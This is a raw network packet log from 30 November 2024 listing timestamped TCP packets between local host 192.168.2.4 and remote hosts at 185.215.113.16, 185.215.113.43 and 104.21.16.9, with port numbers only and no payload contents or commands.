Nov 30, 2024 04:06:20.941482067 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.942286968 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.942338943 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.942379951 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.942426920 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.943155050 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.943209887 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.943250895 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.943300009 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.944071054 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.944118977 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.944173098 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.944224119 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.944960117 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.945008993 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.945100069 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.945147991 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.945897102 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.945949078 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.945998907 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.946048021 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.946780920 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.946827888 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.946887016 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.946937084 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.947690964 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.947745085 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.947803974 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.947850943 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.948620081 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.948684931 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.948720932 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.948767900 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.949482918 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.949532986 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.949628115 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.949676991 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.950417995 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.950464964 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.950537920 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.950587988 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.951328039 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.951375961 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.951417923 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.951467991 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.952265978 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.952316046 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.952362061 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.952414989 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.953131914 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.953180075 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.953274012 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.953319073 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.954041004 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.954092979 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.954129934 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.954180002 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.954957008 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.955003023 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.955056906 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.955105066 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.955874920 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.955934048 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.955944061 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.955990076 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.956769943 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.956819057 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.956892967 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.956945896 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.957683086 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.957735062 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.957768917 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.957822084 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.958642960 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.958689928 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.958717108 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.958765030 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.959491968 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.959542036 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.959611893 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.959660053 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.960423946 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.960477114 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.960525036 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.960573912 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.961344957 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.961393118 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.961425066 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.961471081 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.962230921 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.962282896 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.962501049 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.962549925 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.963155985 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.963202953 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.963294029 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.963340998 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.964147091 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.964195013 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.964220047 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.964263916 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.964885950 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.964936018 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:21.127847910 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:21.127902031 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:21.128000021 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:21.128041983 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:21.128269911 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:21.128314018 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:21.128380060 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:21.128422976 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:21.129300117 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:21.129309893 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:21.129337072 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:21.129353046 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:21.130136013 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:21.130183935 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:21.130212069 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:21.130249023 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:21.131053925 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:21.131100893 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:21.131145954 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:21.131189108 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:21.131938934 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:21.131980896 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:21.132025003 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:21.132067919 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:21.132831097 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:21.132874012 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:21.132937908 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:21.132981062 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:21.133733988 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:21.133776903 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:21.133862019 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:21.133905888 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:21.134651899 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:21.134696007 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:21.134771109 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:21.134814024 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:21.135544062 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:21.135586977 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:21.135715008 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:21.135756016 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:21.136498928 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:21.136547089 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:21.136599064 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:21.136643887 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:21.137362957 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:21.137406111 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:21.137454987 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:21.137506008 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:21.138289928 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:21.138334036 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:21.138379097 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:21.138422012 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:21.139173985 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:21.139219046 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:21.139276028 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:21.139331102 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:21.140088081 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:21.140192032 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:21.140239000 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:21.140980959 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:21.141083956 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:21.141129971 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:21.141922951 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:21.141967058 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:21.142041922 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:21.142086029 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:21.142805099 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:21.142863989 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:21.142903090 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:21.142945051 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:21.143769026 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:21.143821955 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:21.143824100 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:21.143861055 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:21.144638062 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:21.144701958 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:21.144737005 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:21.144784927 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:21.145548105 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:21.145582914 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:21.145600080 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:21.145621061 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:21.146466970 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:21.146511078 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:21.146548986 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:21.146593094 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:21.147344112 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:21.147384882 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:21.147459984 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:21.147499084 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:21.148241997 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:21.148284912 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:21.148376942 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:21.148417950 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:21.149173021 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:21.149384975 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:21.149429083 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:21.150079012 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:21.150120974 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:21.150180101 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:21.150222063 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:21.151050091 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:21.151089907 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:21.151118994 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:21.151159048 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:21.151901007 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:21.151947975 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:21.152030945 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:21.152072906 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:21.152800083 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:21.152945042 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:21.152992964 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:21.153691053 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:21.153749943 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:21.153850079 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:21.153896093 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:21.154639006 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:21.154689074 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:21.154721022 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:21.154757977 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:21.155536890 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:21.155661106 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:21.155719995 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:21.156521082 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:21.156565905 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:21.156598091 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:21.156635046 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:21.157357931 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:21.157454014 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:21.157507896 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:21.158252954 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:21.158297062 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:21.158353090 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:21.158390045 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:21.159182072 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:21.159224033 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:21.159291029 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:21.159334898 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:21.160134077 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:21.160190105 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:21.160259008 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:21.160299063 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:21.160990000 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:21.161087036 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:21.161134958 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:21.161930084 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:21.161974907 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:21.162058115 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:21.162092924 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:21.162902117 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:21.162949085 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:21.162997961 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:21.163034916 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:21.163697958 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:21.163760900 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:21.163794994 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:21.163870096 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:21.164627075 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:21.164665937 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:21.164681911 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:21.164721966 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:21.165534019 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:21.165584087 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:21.165687084 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:21.165730953 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:21.166465998 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:21.166512012 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:21.166544914 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:21.166588068 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:21.167342901 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:21.167380095 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:21.167458057 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:21.167504072 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:21.168260098 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:21.168303013 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:21.168420076 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:21.168459892 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:21.169172049 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:21.169214964 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:21.169271946 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:21.169312954 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:21.170072079 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:21.170114040 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:21.170214891 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:21.170258045 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:21.170974970 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:21.171051025 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:21.171086073 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:21.171128035 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:21.171932936 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:21.171976089 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:21.172044992 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:21.172086954 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:21.172779083 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:21.172826052 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:21.172992945 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:21.173032999 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:21.173686981 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:21.173732996 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:21.173814058 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:21.173856974 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:21.174607992 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:21.174649000 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:21.174717903 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:21.174761057 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:21.175479889 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:21.175524950 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:21.338527918 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:21.338602066 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:21.338658094 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:21.338826895 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:21.338871002 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:21.338900089 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:21.338943005 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:23.505604029 CET	49797	443	192.168.2.4	104.21.16.9
Nov 30, 2024 04:06:23.505623102 CET	443	49797	104.21.16.9	192.168.2.4
Nov 30, 2024 04:06:23.505811930 CET	49797	443	192.168.2.4	104.21.16.9
Nov 30, 2024 04:06:23.522509098 CET	49797	443	192.168.2.4	104.21.16.9
Nov 30, 2024 04:06:23.522519112 CET	443	49797	104.21.16.9	192.168.2.4
Nov 30, 2024 04:06:23.596925974 CET	49780	80	192.168.2.4	185.215.113.43
Nov 30, 2024 04:06:23.597316027 CET	49798	80	192.168.2.4	185.215.113.43
Nov 30, 2024 04:06:23.717149973 CET	80	49798	185.215.113.43	192.168.2.4
Nov 30, 2024 04:06:23.717211962 CET	49798	80	192.168.2.4	185.215.113.43
Nov 30, 2024 04:06:23.717406034 CET	49798	80	192.168.2.4	185.215.113.43
Nov 30, 2024 04:06:23.718805075 CET	80	49780	185.215.113.43	192.168.2.4
Nov 30, 2024 04:06:23.718849897 CET	49780	80	192.168.2.4	185.215.113.43
Nov 30, 2024 04:06:23.837280035 CET	80	49798	185.215.113.43	192.168.2.4
Nov 30, 2024 04:06:24.859250069 CET	443	49797	104.21.16.9	192.168.2.4
Nov 30, 2024 04:06:24.859421015 CET	49797	443	192.168.2.4	104.21.16.9
Nov 30, 2024 04:06:24.860789061 CET	49797	443	192.168.2.4	104.21.16.9
Nov 30, 2024 04:06:24.860796928 CET	443	49797	104.21.16.9	192.168.2.4
Nov 30, 2024 04:06:24.861290932 CET	443	49797	104.21.16.9	192.168.2.4
Nov 30, 2024 04:06:24.905328035 CET	49797	443	192.168.2.4	104.21.16.9
Nov 30, 2024 04:06:24.907630920 CET	49797	443	192.168.2.4	104.21.16.9
Nov 30, 2024 04:06:24.907649040 CET	49797	443	192.168.2.4	104.21.16.9
Nov 30, 2024 04:06:24.907736063 CET	443	49797	104.21.16.9	192.168.2.4
Nov 30, 2024 04:06:25.099879980 CET	80	49798	185.215.113.43	192.168.2.4
